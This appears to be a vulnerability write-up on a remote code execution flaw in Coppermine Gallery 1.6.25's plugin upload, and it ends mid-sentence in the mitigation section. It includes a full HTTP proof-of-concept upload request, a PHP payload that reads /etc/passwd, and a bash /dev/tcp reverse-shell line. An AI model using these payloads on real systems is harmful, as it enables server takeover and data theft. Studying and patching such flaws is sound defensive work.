Coppermine Gallery 1.6.25 - RCE

Coppermine Gallery 1.6.25 Remote Code Execution (RCE) Vulnerability: A Deep Dive into Exploitation and Mitigation

The Coppermine Gallery 1.6.25 remote code execution (RCE) vulnerability, discovered on September 5, 2023, by security researcher Mirabbas Ağalarov, represents a critical flaw in a widely used PHP-based photo gallery application. This vulnerability enables attackers to execute arbitrary system commands through the plugin management interface, posing a severe threat to system integrity and data confidentiality.

Understanding the Vulnerability

Coppermine Gallery is a popular open-source web application designed to manage and display photo collections. Version 1.6.25, while stable in functionality, contains a dangerous flaw in its pluginmgr.php file, which handles plugin uploads. The application allows users to upload ZIP files containing PHP scripts, but fails to sanitize or validate the contents properly before extracting and executing them.

Due to improper handling of uploaded archives, the system extracts ZIP files directly into the plugins/ directory without verifying file types or content. This bypasses security checks, enabling an attacker to upload a malicious PHP file disguised as part of a legitimate plugin archive.

Exploitation Steps and Proof of Concept (POC)

Here’s a step-by-step breakdown of how the RCE exploit is executed:

• Create a malicious PHP file: A simple PHP script that executes system commands, such as cat /etc/passwd, is written.
• Package it in a ZIP archive: The PHP file is compressed into a ZIP file to mimic a legitimate plugin package.
• Authenticate to the application: The attacker must have valid credentials to access the plugin management interface.
• Upload the ZIP file: Using the pluginmgr.php endpoint with the op=upload parameter, the malicious ZIP is uploaded.
• Execute the payload: Once uploaded, the PHP file is accessible via the web server path /plugins/test.php.

Proof of Concept Request

POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1
Host: localhost
Content-Length: 630
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c
Connection: close

------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="plugin"; filename="test.zip"
Content-Type: application/zip

PK
�����™b%Wz½µ}(���(�����test.phpUT�ñòödÓòödux���������
PK
�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="form_token"

50982f2e64a7bfa63dbd912a7fdb4e1e
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="timestamp"

1693905214
------WebKitFormBoundaryi1AopwPnBYPdzorF--

This HTTP request demonstrates the upload process. The key components include:

• multipart/form-data boundary for handling file upload.
• Content-Disposition: form-data; name="plugin"; filename="test.zip" — indicating the ZIP file upload.
• Content-Type: application/zip — correctly identifying the file type.
• ZIP content — embedded PHP script that executes system('cat /etc/passwd').
• form_token and timestamp — CSRF protection tokens, required for successful upload.

Upon successful upload, the attacker can navigate to http://localhost/cpg1.6.x-1.6.25/plugins/test.php and observe the output of /etc/passwd, confirming RCE success.

Technical Root Cause

The vulnerability stems from a lack of file validation and execution sandboxing in the plugin upload process. Specifically:

• ZIP archives are extracted without checking for PHP file extensions.
• Uploaded files are directly placed in the plugins/ directory, which is accessible via the web server.
• No filtering or whitelisting of file types (e.g., only allowing .php files if explicitly permitted).
• PHP execution is not restricted to trusted or approved plugin directories.

This creates an open door for arbitrary code execution, especially when combined with a valid user session.

Real-World Impact and Risks

Attackers leveraging this vulnerability can:

• Read sensitive system files like /etc/passwd, /etc/shadow, or configuration files.
• Deploy reverse shells via system('bash -i >& /dev/tcp/192.168.1.100/4444 0>&1').
• Execute commands to escalate privileges, install backdoors, or exfiltrate data.
• Gain full control over the web server and potentially the underlying host system.

Given that Coppermine Gallery is often deployed in shared hosting environments or on personal servers, this RCE can compromise not only the gallery but also the entire hosting infrastructure.

Security Recommendations and Mitigation

To protect systems running Coppermine Gallery 1.6.25, the following actions are essential:

• Upgrade immediately: Upgrade to a patched version (e.g., v1.6.26 or later) as provided by the official vendor coppermine-gallery.net.
• Disable plugin upload functionality: If plugins are not required, disable the pluginmgr.php interface entirely.
• Implement file type restrictions: Configure the server to only allow specific file types (e.g., .txt, .css) for uploads, and block